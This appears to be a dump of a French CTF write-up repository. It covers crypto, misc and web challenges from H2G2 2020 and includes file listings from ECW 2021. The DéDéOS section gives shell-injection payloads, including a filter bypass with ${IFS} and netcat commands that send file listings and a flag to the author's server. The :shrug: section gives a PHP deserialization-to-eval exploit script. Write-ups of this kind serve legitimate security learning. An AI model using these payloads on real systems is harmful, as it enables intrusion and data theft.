voir comment nous pourront exploiter cela. Le serveur demande un chiffre et ne réagit pas aux lettres ni aux nombres à virgule... mais il répond si on lui passe un nombre négatif ! 13 | 14 | Pour comprendre la suite, il est nécessaire de connaître la notion de *modulo* (reste dans la division euclidienne) et le [fonctionnement du RSA](https://fr.wikipedia.org/wiki/Chiffrement_RSA#Fonctionnement_d%C3%A9taill%C3%A9). Pour rappel, la clé publique contient les nombres `n` et `e`. Si `M` est le message en clair et `C` le message chiffré, nous faisons ce calcul pour chiffrer un message : 15 | 16 |  17 | 18 | Le serveur connaît un nombre `d`, incalculable pour nous, tel que : 19 | 20 |  21 | 22 | Si l'on envoie `-1` à déchiffrer par exemple, le serveur répond un nombre égal à `n - 1` car (`d` étant impair) : 23 | 24 | ^d%20\equiv%20-1%20\mod%20n) 25 | 26 | Le reste dans la division euclidienne ne peut pas être négatif donc le serveur ajoute `n` une fois pour avoir un nombre tel que `0 <= C < n`. 27 | 28 | Il suffit donc d'envoyer l'opposé de notre nombre secret et on pourra déduire le flag car : 29 | 30 |  31 | 32 | Si on envoie `-secret`, le serveur nous répond `n - flag` ! 33 | 34 | Pour la forme je fais un joli script : 35 | 36 | ```python 37 | from Crypto.PublicKey import RSA 38 | from pwn import remote 39 | 40 | with open("public.pem") as f: 41 | key = RSA.import_key(f.read()) 42 | 43 | with open("secret") as f: 44 | secret = f.read() 45 | 46 | conn = remote("decryptor.interiut.ctf", 1337) 47 | 48 | conn.send(b'-'+secret.encode()) 49 | 50 | flag = key.n - int(conn.recvline().decode()[:-1]) 51 | 52 | conn.close() 53 | 54 | print(flag.to_bytes(39, 'big').decode()) 55 | ``` 56 | 57 | 58 | 59 | -------------------------------------------------------------------------------- /2020/H2G2/crypto/public.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN PUBLIC KEY----- 2 | MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA9GOeCZB79Qa1m7UQ4OY9 3 | 8HKa7CoMYKLgvs6EGn8VsY4hRwcuJfq5B/CArbXgUu9FjSt8DIiQeU2rCqVlj3DE 4 | vRe1982WVJgTGj5Przy1+8lV0L8o9lhksZ+9scaZPuU74gIo+XIrGUgJBzJ1TeA8 5 | FFW1Y+BfUMckqrLnIaDjPEaAV1XUPtQbs8m+6owgIEV8pwQg+rLxJNx3Su01Ylcu 6 | 175uWUxbh71hKQq+D9HX+wxER7rUVijS+nd0KId6g/ngwDhLmkWKUPHQVL6hYYVR 7 | 6h/keUUknClRifYTcQwe2inMx5C4qUaTU9p2/aR+mkLY8hPKbmOJt2Qz+OBuOvnr 8 | iwIDAQAB 9 | -----END PUBLIC KEY----- 10 | -------------------------------------------------------------------------------- /2020/H2G2/crypto/sage1.md: -------------------------------------------------------------------------------- 1 | # Le SAGE doré - 20 pts 2 | 3 | > Le vieux sage du village se rappelle avoir reçu un message chiffré il y a longtemps par l'un de ses disciples, mais a malheureusement depuis perdu la clé privé correspondante. Il a directement pensé à vous et pense que cet mission sera parfaite pour débuter votre ascension vers la voie du SAGE, retrouvez la clé privé ainsi que le contenu du message. 4 | > 5 | > Commencez votre aventure ici : https://tinyurl.com/y4qvu9lv 6 | > 7 | > Voilà quelques ressources pour vous aider dans cette tâche : 8 | > 9 | > - http://doc.sagemath.org/html/en/reference/cryptography/index.html 10 | > 11 | > - https://www.unilim.fr/pages_perso/vincent.jalby/resources/commun/IntroSage2.pdf 12 | 13 | Le premier lien mène vers ce code : 14 | 15 | ```python 16 | # CHALLENGE 17 | from sage.crypto.public_key.blum_goldwasser import BlumGoldwasser 18 | from sage.crypto.util import bin_to_ascii, ascii_to_bin 19 | 20 | encrypted_flag = ([[1, 1, 1, 1, 0, 0], [1, 1, 1, 0, 1, 1], [1, 0, 1, 1, 1, 0], [0, 1, 1, 1, 0, 1], [0, 0, 0, 1, 1, 1], [0, 1, 0, 1, 1, 0], [0, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0], [1, 1, 0, 0, 1, 0], [0, 1, 1, 1, 1, 1], [1, 0, 1, 0, 0, 0], [0, 1, 1, 0, 0, 0], [0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 1, 1], [1, 0, 0, 1, 0, 1], [1, 1, 1, 1, 0, 0], [0, 1, 1, 0, 0, 1], [1, 1, 0, 1, 0, 1], [0, 0, 1, 0, 0, 1], [1, 0, 0, 1, 0, 1]], 6049402465830679674781261764183) 21 | pub_key = 8054793366550713418339620131461 22 | ``` 23 | 24 | On retrouve la page de la documentation correspondant à [sage.crypto.public_key.blum_goldwasser](https://doc.sagemath.org/html/en/reference/cryptography/sage/crypto/public_key/blum_goldwasser.html#module-sage.crypto.public_key.blum_goldwasser). La clé publique est le produit de deux nombres premiers. Vu la taille du nombre, [WolframAlpha](https://www.wolframalpha.com/input/?i=factorize+8054793366550713418339620131461) retrouve les facteurs : `1489304211816227` et `5408427171993143`. Ne reste plus qu'à décoder : 25 | 26 | ```python 27 | bg = BlumGoldwasser() 28 | 29 | p, q = 1489304211816227, 5408427171993143 30 | 31 | print(bg.public_key(p, q)) # on retrouve bien la même clé publique 32 | 33 | flag_bits = bg.decrypt(encrypted_flag, bg.private_key(p, q)) 34 | 35 | print(bin_to_ascii(flatten(flag_bits))) 36 | ``` 37 | -------------------------------------------------------------------------------- /2020/H2G2/crypto/secret: -------------------------------------------------------------------------------- 1 | 27894212612486632514216239257400870619171133454101778962925249544326340301963944069858608662506465357671798085772840385798921676814302159488322178853581620235650996446093832566144742688847734518145357681701488781488852182807530903079647275409416170699753658199778067572800834163907087794535839842740194535956441665562362578195442164314430949936974469169343212942056032478104179162610385007560593441758864523332489780780648469256444440176287228524183221088838932552608847130171789605433928784467037613731971230412474987462072203712098579628186050741460889352012125226015085052337272092366056265676877284120507539486420 2 | -------------------------------------------------------------------------------- /2020/H2G2/forensic/Confidential.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2020/H2G2/forensic/Confidential.jpg -------------------------------------------------------------------------------- /2020/H2G2/forensic/Confidential.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2020/H2G2/forensic/Confidential.pdf -------------------------------------------------------------------------------- /2020/H2G2/forensic/exfiltration.pcapng: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2020/H2G2/forensic/exfiltration.pcapng -------------------------------------------------------------------------------- /2020/H2G2/forensic/flag.txt: -------------------------------------------------------------------------------- 1 | H2G2{This_is_not_the_flag_¯\_(ツ)_/¯} 2 | -------------------------------------------------------------------------------- /2020/H2G2/forensic/ping_pong.md: -------------------------------------------------------------------------------- 1 | tshark -r ping_pong.pcapng -T fields -e data -Y "ip.src==10.5.0.2" | xxd -r -ps -c 1 2 | -------------------------------------------------------------------------------- /2020/H2G2/misc/DNA.md: -------------------------------------------------------------------------------- 1 | # D.N.A. - 20 pts 2 | 3 | > Rediscover your hacker's roots interiutwzsx3dvp.onion 4 | 5 | Ce site est une adresse du réseau Tor. J'installe donc [Tor Browser](https://www.torproject.org/download/). Voici à quoi ressemble la page : 6 | 7 |  8 | 9 | À chaque rafraîchissement de la page, un nouveau token est donné. Tor Browser étant un navigateur Firefox, je commence par installer [RESTClient](https://addons.mozilla.org/fr/firefox/addon/restclient/), une extension permettant de créer des requêtes facilement. Je poste le JSON fourni et je reçois cette réponse : 10 | 11 | ```json 12 | {"quote":"4 c3n5u5 74k3r 0nc3 7ri3d 70 7357 m3. i 473 hi5 1iv3r wi7h 50m3 f4v4 b34n5 4nd 4 nic3 chi4n7i."} 13 | ``` 14 | 15 | C'est du [leet](https://fr.wikipedia.org/wiki/Leet_speak) (on comprend mieux le *unleeted* dans le texte de la page). Après plusieurs essais, on se rend compte que les transformations sont assez simples : les lettres `o`, `l`, `e`, `a`, `s`, `t` sont toujours remplacées par `0`, `1`, `3`, `4`, `5` et `7`. 16 | 17 | Je pourrais faire un programme dans la console JavaScript de Tor Browser mais ce n'est pas mon langage de prédilection et j'ai peur d'être limité par les restrictions de sécurité de ce navigateur. Je me dis que c'est donc l'occasion parfaite pour apprendre à utiliser un proxy [Socks5](https://fr.wikipedia.org/wiki/SOCKS), dont j'avais déjà entendu parler. 18 | 19 | Je fais des recherches et j'apprends que Tor Browser fournit naturellement un proxy socks5 sur le port 9150 ! Je tombe rapidement sur [cet exemple](https://gist.github.com/jefftriplett/9748036) : 20 | 21 | ```python 22 | import requests 23 | 24 | proxies = { 25 | 'http': 'socks5://127.0.0.1:9150', 26 | 'https': 'socks5://127.0.0.1:9150' 27 | } 28 | 29 | url = 'http://ifconfig.me/ip' 30 | 31 | response = requests.get(url) 32 | print('ip: {}'.format(response.text.strip())) 33 | 34 | response = requests.get(url, proxies=proxies) 35 | print('tor ip: {}'.format(response.text.strip())) 36 | ``` 37 | 38 | Cela fonctionne, j'arrive à accéder à des sites via Tor. Seulement cela ne fonctionne plus avec des site en `.onion`. [StackOverflow](https://stackoverflow.com/questions/51259693/python-requests-lib-working-via-proxysocks5-tor-error) me sauve la mise : il faut remplacer `socks5://` par `socks5h://` dans les adresses proxy. 39 | 40 | Voici le programme final : 41 | 42 | ```python 43 | import requests 44 | 45 | conv = {"0": "o", "1":"l", "3":"e", "4":"a", "5":"s", "7":"t"} 46 | 47 | s = requests.session() 48 | s.proxies['http'] = 'socks5h://127.0.0.1:9150' 49 | s.proxies['https'] = 'socks5h://127.0.0.1:9150' 50 | 51 | source = s.get("http://interiutwzsx3dvp.onion/").content.decode() 52 | token = source.split("\n")[23].split('"')[3] 53 | 54 | r = s.post('http://interiutwzsx3dvp.onion//challenge', json={"token": token}).json() 55 | 56 | while 'quote' in r: 57 | quote = r['quote'] 58 | print('\nchallenge :', quote) 59 | 60 | for k in conv: 61 | quote = quote.replace(k, conv[k]) 62 | 63 | print('answer:', quote) 64 | 65 | r = s.post('http://interiutwzsx3dvp.onion//challenge', json={"token": token, "payload": quote}).json() 66 | 67 | 68 | print("\n", r) 69 | 70 | ``` 71 | 72 | Cela tourne une petite minute avant d'afficher : 73 | 74 | ```json 75 | {'congratz': 'First step completed, gg wp', 'flag': 'H2G2{th3r3_1s_n0_SP00N}'} 76 | ``` 77 | 78 | Merci Masterfox pour ce misc super original ! -------------------------------------------------------------------------------- /2020/H2G2/misc/bases.md: -------------------------------------------------------------------------------- 1 | # 1110011 1100001 1101100 1110101 1110100 - 20 pts 2 | 3 | > 2202 1110 10121 10220 11001 10202 11020 10121 10220 11021 1012 11021 10121 11101 11010 10220 11020 1012 10200 11010 11001 11001 10202 11002 11022 1012 10210 10121 10220 11020 10202 1012 11100 11002 10202 1012 10122 11010 11002 11002 10202 1012 11011 11100 11020 10202 10202 4 | > 5 | > salut.interiut.ctf:1337 6 | > 7 | > Hint: Bon, ok, ça respecte pas les RFC ... Mais c'est quand même plus logique 8 | 9 | Mon premier réflexe est d'utiliser [CyberChef](https://gchq.github.io/CyberChef/) pour décoder le titre mais cela ne donne rien. En étant plus attentif (et grâce à l'indice) on voit que les bits sont regroupés par groupe de 7 ! Si on les décode indivuduellement, on obtient `115 97 108 117 116` soit les codes ASCII des lettres `s a l u t`. 10 | 11 | La description semble être en base 3, on la convertit en entier en respectant les groupes puis on décode comme étant de l'ASCII : `J'aimerais savoir comment faire une bonne puree`. 12 | 13 | Maintenant `nc salut.interiut.ctf 1337` pour discuter avec le serveur. Il envoie un texte encodé de façon similaire au titre (en binaire) puis si on envoie la bonne réponse, il envoie un texte en base 3 puis en base 4... Il va falloir automatiser le décodage. En tâtonnant on voit que le dernier challenge est de la base 31 puis le flag est envoyé. 14 | 15 | ```python 16 | from pwn import remote 17 | 18 | conn = remote('salut.interiut.ctf', 1337) 19 | 20 | for base in range(2, 32): 21 | txt = conn.recvline().decode()[:-1] 22 | 23 | answer = "" 24 | for i in txt.split(): 25 | answer += chr(int(i, base)) 26 | print(answer) 27 | conn.send(answer.encode()+b'\n') 28 | 29 | print("\n", conn.recvline().decode()) 30 | 31 | conn.close() 32 | ``` 33 | 34 | Résultat : 35 | 36 | ``` 37 | Je s4is dej4 f4ire l4 r4t4touille, les endives 4u j4mbon, le gr4tin 38 | Et plein d'autres plats qui n'0nt rien a v0ir avec une b0nne puree 39 | Qu3l 3st votr3 s3cr3t ? 40 | Le l4it ? Le beurre ? L4 creme ? 41 | Qu3l 3st votr3 s3cr3t ? 42 | S'il v0us pl4it 4idez-m0i 43 | Qu3l 3st votr3 s3cr3t ? 44 | P0ur f4ire une b0nne puree, ce qui est p4s m4l qu4nd 0n cuit les p0mmes de terre 45 | C'3st d3 m3ttr3 du lauri3r 3t du thym pour parfum3r 3n amont 46 | Apres tu peux 4j0uter n'imp0rte quel epice 47 | Tu p3ux m3ttr3 du safran, du curcuma, du ging3mbr3 48 | Ou une g0usse d'4il une f0is que les p4t4tes s0nt petries 49 | Et si la pur33 a cram3 50 | Rec0uvre-l4 4vec un chiff0n m0uille 51 | Et fais coul3r du s3l d3ssus 52 | P0ur 4bs0rber les senteurs de brule 53 | Excus3 moi, mais c'3st pas vraim3nt ca qu3 j'avais d3mand3 54 | Le pr0bleme 4vec m4 puree c'est qu'elle n'est p4s 0nctueuse 55 | P3ux-tu m'3xpliqu3r, comm3nt obt3nir un3 t3xtur3 parfait3 ? 56 | P0ur l4 puree 0nctueuse ce qu'il f4ut dej4 57 | C'3st pas trop la m3lang3r ou l'3cras3r 58 | Puisque c0mme d4ns l4 puree il y 4 du gluten c4 v4 devenir tres el4stique 59 | L'utilisation du pr3ss3-pur33 a l3vi3r p3rm3t d'obt3nir un3 pur33 plus fin3 3t l3g3r3 60 | T0ut est d4ns l4 texture 61 | Car la pur33 trop collant3 3st vraim3nt tr3s d3c3vant3 62 | Pense 4 c4 4v4nt de cuisiner et tu reussir4s une b0nne puree 63 | Tu v3rras, c'3st plus facil3 qu3 ca 3n a l'air 64 | Et surt0ut, 4pres c4 tu ne v0udr4s plus d'une 4utre puree 65 | J'ai 4 homm3s a la maison 3t ils s3 r3gal3nt tous 66 | Il n'en reste j4m4is ! 67 | 68 | H2G2{D0_y0u_l1k3_14_pur33_?} 69 | ``` 70 | 71 | Cela permet un bon rappel que les données informatiques ne sont que des chiffres et qu'il faut les considérer comme tel ;) -------------------------------------------------------------------------------- /2020/H2G2/misc/site.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2020/H2G2/misc/site.png -------------------------------------------------------------------------------- /2020/H2G2/web/dedeos.md: -------------------------------------------------------------------------------- 1 | # DéDéOS 2 | 3 | Ce challenge est découpé en 3 parties. Nous accédons à chaque fois à une page similaire où il faudra faire une injection de commandes shell. À chaque étape de nouveaux tests sont effectués pour empêcher les injections. 4 | 5 | 6 | 7 | ## DéDéOS 1 - 10 pts 8 | 9 | > Serveur de déni de service en masse pour les 1337 h4xorz. Essayer de prouver au propriétaire que c'est de la merde. Lire le fichier contenant le flag. 10 | > 11 | > http://dedeos-1.interiut.ctf/ 12 | 13 | La page présente un formulaire où entrer une adresse IP. Nous pouvons supposer que le code PHP (des headers PHP sont envoyés par le serveur) fait un ping de cette IP pour afficher `Cible atteinte` ou `Cible non atteignable` sur la page. 14 | 15 | On essaie d'injecter `;ls;` par exemple et nous obtenons carrément la sortie de la commande : 16 | 17 | Nous pouvons faire `;ls -lRa;` pour localiser le flag puis `;cat secret/the/flag/is/here/.flag;` pour l'afficher. 18 | 19 | On peut également afficher le code PHP : 20 | 21 | ```php 22 | if(isset($_POST['submit']) && isset($_POST['ip']) && !empty($_POST['ip'])){ 23 | $ip = $_POST['ip']; 24 | echo "
Résultat de l'attaque :
"; 25 | echo "".shell_exec("ping -c 1 $ip > /dev/null && echo 'Cible atteinte' || echo 'Cible non atteignable'").""; 26 | } 27 | ``` 28 | 29 | (Ce code sera le même au fil des étapes mais des vérifications seront effectuées sur notre entrée.) 30 | 31 | ## DéDéOS 2 - 20 pts 32 | 33 | > Le propriétaire s'est rendu compte de votre talent, il vous met au défi de nouveau 34 | > 35 | > http://dedeos-2.interiut.ctf/ 36 | 37 | La page semble identique à la précédente. `;ls;` renvoie une réponse mais `;ls -lRa;` ne passe pas : `Attaque malicieuse détectée`. Il semblerait que les espaces soient interdits. Il suffit alors de les remplacer par `${IFS}` ! En effet, `;ls${IFS}-laR;` nous énumère les fichiers et `;cat${IFS}flag/it/is/soon/here/flag.md;` affiche le flag. 38 | 39 | Le code qui nous testait : 40 | 41 | ```php 42 | if(isset($_POST['submit']) && isset($_POST['ip']) && !empty($_POST['ip'])){ 43 | $ip = $_POST['ip']; 44 | if(strstr($ip, " ")){ 45 | die("
Attaque malicieuse détectée."); 46 | } 47 | echo "
Résultat de l'attaque :
"; 48 | echo "".shell_exec("ping -c 1 $ip > /dev/null && echo 'Cible atteinte' || echo 'Cible non atteignable'").""; 49 | } 50 | ``` 51 | 52 | ## DéDéOS 3 - 50 pts 53 | 54 | Cette fois-ci `;ls;` ne passe pas car les `;` sont interdits. Compte tenu de la structure de la commande, je pense qu'il n'y a que 2 solutions : une injection en blind en jouant avec le code de retour (très long et on est pas dans du misc) ou alors exfiltrer des données avec netcat par exemple. 55 | 56 | Je lance netcat en écoute sur le port 2020 de mon VPS puis j'injecte `||ls${IFS}-laR|nc${IFS}ribt.fr${IFS}2020`. Je récupère bien la liste des fichiers et `||cat${IFS}.secret/2/1/3/flag.txt|nc${IFS}ribt.fr${IFS}2020` me permet de récupérer le flag. 57 | 58 | Le code : 59 | 60 | ```php 61 | if(isset($_POST['submit']) && isset($_POST['ip']) && !empty($_POST['ip'])){ 62 | $ip = $_POST['ip']; 63 | if(strstr($ip, " ") || strstr($ip, ";")){ 64 | die("
Attaque malicieuse détectée."); 65 | } 66 | echo "
Résultat de l'attaque :
"; 67 | echo "".shell_exec("ping -c 1 $ip > /dev/null && echo 'Cible atteinte' || echo 'Cible non atteignable'").""; 68 | } 69 | ``` 70 | 71 | Légèrement déçu de ne pas aller plus loin avec des interdictions de lettres par exemple... -------------------------------------------------------------------------------- /2020/H2G2/web/shrug.md: -------------------------------------------------------------------------------- 1 | # :shrug: - 20 pts 2 | 3 | > http://shrug.interiut.ctf/ 4 | 5 | La page a la bonne idée de nous donner son code source : 6 | 7 | ```php 8 | order = $_POST['b_order']; 19 | } else { 20 | $this -> order = "eau"; 21 | } 22 | } 23 | 24 | public function __wakeup() { 25 | echo $this -> kevin($this -> order); 26 | } 27 | 28 | public function kevin($order) { 29 | $drinks = ["eau", "moscow_mule", "dark_n_stormy", "mojito", "sex_on_the_beach", "duchesse"]; 30 | if(in_array($order, $drinks)) { 31 | return "Votre " . $order . " est en préparation."; 32 | } else { 33 | eval($order); 34 | } 35 | } 36 | } 37 | 38 | $a = $_GET['dio']; 39 | $b = $_GET['jotaro']; 40 | $c = $_POST['stand']; 41 | 42 | if(isset($a) && isset($b) && isset($c)) { 43 | if($c == "Hermit Purple") { 44 | unserialize($_GET['dio']); 45 | } 46 | } 47 | ``` 48 | 49 | Drôle de code... Si l'on envoie les paramètres `dio` en GET, `jotaro` en GET et `stand` en POST et que `stand` est égal à `Hermit Purple` alors le contenu de `dio` est désérialisé ! 50 | 51 | Je me dis que quitte à avoir le code, autant le copie sur mon propre serveur en mettant des `echo` partout et en activant les warnings pour gagner du temps. Je lance également le code dans une console PHP interactive : 52 | 53 | ```php 54 | php> $b = new Boussole; 55 | php> echo serialize($b); 56 | O:8:"Boussole":1:{s:5:"order";s:3:"eau";} 57 | ``` 58 | 59 | Comme on le voit dans le code de la page, si la boisson n'est pas dans la liste alors on fait un `eval` dessus. Voici le code Python pour exécuter une commande shell : 60 | 61 | ```python 62 | import requests 63 | from urllib.parse import quote_plus 64 | 65 | payload = "system('ls -lRa');" 66 | serial = quote_plus('O:8:"Boussole":1:{s:5:"order";s:'+str(len(payload))+':"'+payload+'";}') 67 | 68 | r = requests.post(f"http://shrug.interiut.ctf/?dio={serial}&jotaro=b", data={'stand':'Hermit Purple', 'b_order':"1"}) 69 | 70 | print(r.content.decode()) 71 | ``` 72 | 73 | On obtient la liste des fichiers et l'on voit un fichier au nom étrange que l'on peut lire directement dans le navigateur : http://shrug.interiut.ctf/b0e4c25d3de6860f7a396a8148a42fda.txt 74 | 75 | ``` 76 | H2G2{Uns3rial1z4tiOn_iS_eAsY_r1ght?} 77 | ``` 78 | 79 | -------------------------------------------------------------------------------- /2021/ECW/README.md: -------------------------------------------------------------------------------- 1 | The European Cyber Week is a French event. The CTF is organized by Thalès and the COMCYBER and it is reserved to students. 2 | 3 | ## Foresensics 4 | 5 | - [Response Team](./forensics/ResponseTeam.md) 6 | 7 | - [Nightly Planet](./forensics/NightlyPlanet.md) 8 | 9 | ## OSINT 10 | 11 | - [RedTeam](./pentest/RedTeam.md) 12 | 13 | -------------------------------------------------------------------------------- /2021/ECW/forensics/CONFIDENTIAL.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/CONFIDENTIAL.pdf -------------------------------------------------------------------------------- /2021/ECW/forensics/ECW_chall_JBV.pcapng: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/ECW_chall_JBV.pcapng -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Application.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Application.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/HardwareEvents.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/HardwareEvents.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Internet Explorer.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Internet Explorer.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Key Management Service.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Key Management Service.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Client-Licensing-Platform%4Admin.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Client-Licensing-Platform%4Admin.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-AAD%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-AAD%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-AppModel-Runtime%4Admin.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-AppModel-Runtime%4Admin.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-AppReadiness%4Admin.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-AppReadiness%4Admin.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-AppReadiness%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-AppReadiness%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-AppXDeployment%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-AppXDeployment%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-AppXDeploymentServer%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-AppXDeploymentServer%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Application-Experience%4Program-Compatibility-Troubleshooter.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Application-Experience%4Program-Compatibility-Troubleshooter.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Application-Experience%4Program-Inventory.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Application-Experience%4Program-Inventory.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Application-Experience%4Steps-Recorder.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Application-Experience%4Steps-Recorder.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-AppxPackaging%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-AppxPackaging%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Authentication User Interface%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Authentication User Interface%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Biometrics%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Biometrics%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Bits-Client%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Bits-Client%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-CloudStore%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-CloudStore%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-CodeIntegrity%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-CodeIntegrity%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-Containers-Wcifs%4Operational.evtx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2021/ECW/forensics/Logs/Microsoft-Windows-Containers-Wcifs%4Operational.evtx -------------------------------------------------------------------------------- /2021/ECW/forensics/Logs/Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx: -------------------------------------------------------------------------------- 